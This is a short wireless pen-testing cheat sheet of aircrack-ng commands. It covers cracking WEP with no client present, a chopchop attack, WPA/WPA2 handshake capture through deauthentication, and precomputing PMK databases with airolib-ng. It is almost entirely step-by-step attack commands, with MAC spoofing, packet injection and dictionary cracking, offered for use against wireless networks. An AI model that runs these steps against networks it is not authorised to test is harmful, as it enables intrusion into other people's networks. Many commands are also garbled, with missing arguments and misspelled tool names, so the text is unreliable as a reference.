Wireless Pen-Testing

No Client WEP Cracking

This is a quick bullet point step by step guide to wireless password cracking
Assumptions
Your wireless interface is "ath0"

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
=== copy BSSID
airodump-ng -c -6 -w filesname --bssid ath0
aireplay-ng -1 0 -a -h 00:11:22:33:44:55 ath0
aireplay-ng -3 -b -h 00:11:22:33:44:55 ath0
aircrack-ng -n 64 OR 128 -0 --bssid filename.cap


--------------------------------------------------------------------------------

No Client Korek Chopchop Attack

airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
airodump-ng ath0
#ctrl+c when you see your network
#make a note of the bssid and chan
airmon-ng -c -w --bssid ath0
# leave it running ... open a new shell
aireplay-ng -1 0 -e -a -h 00:11:22:33:44:55 ath0
aireplay-ng -4 -h 00:11:22:33:44:55 -b -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y -w
# now to inject the ARP packet
aireplay-ng -2 -r ath0
# prompt uses this packet ?
y
# once you have enough packets start aircrack-ng
aircrack-ng -n 64 or 128 -z -f 1 -e -b *.cap


--------------------------------------------------------------------------------

WPA-WPA2 Cracking

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-n -0 1 -a -c ath0
Ctrl+c .. when you have handshake
aircrack-ng -w -b .cap


--------------------------------------------------------------------------------

WPA-WPA2 With Airolib-ng Databases

# make sure you have SQLite3 installed
# install it
# download and install latest dev version of aircrack

svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
cd aircrack-ng
gmake SQLITE=trun
gmake SQLITE=true install

# create a new text file called ssidlist.txt
# enter the name of your network(s). One per line.
# the database will be created if it does not exist

airolib-ng testdb --import essid ssidlist.txt

# import your dictionary file into the database

airolib-ng testdb --import ascii passwd password.lst

# clean up the database to get rid of any errors

airolib-ng testdb clean all

# now to create the database

airolib-ng testdb batch

# once it says No free ssid found .... press Ctrl+C or it'll keep running.
# next verify the database. This will check about 1000 random PMK's

airolib-ng testdb verify

# verifys everything
airolib-ng testdb verify

# now to crack the WPA/WPA2 key

airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0
airodump-ng -c -w --bssid ath0
aireplay-n -0 1 -a -c ath0

# Ctrl+c .. when you have handshake

aircrack-ng -r testdb .cap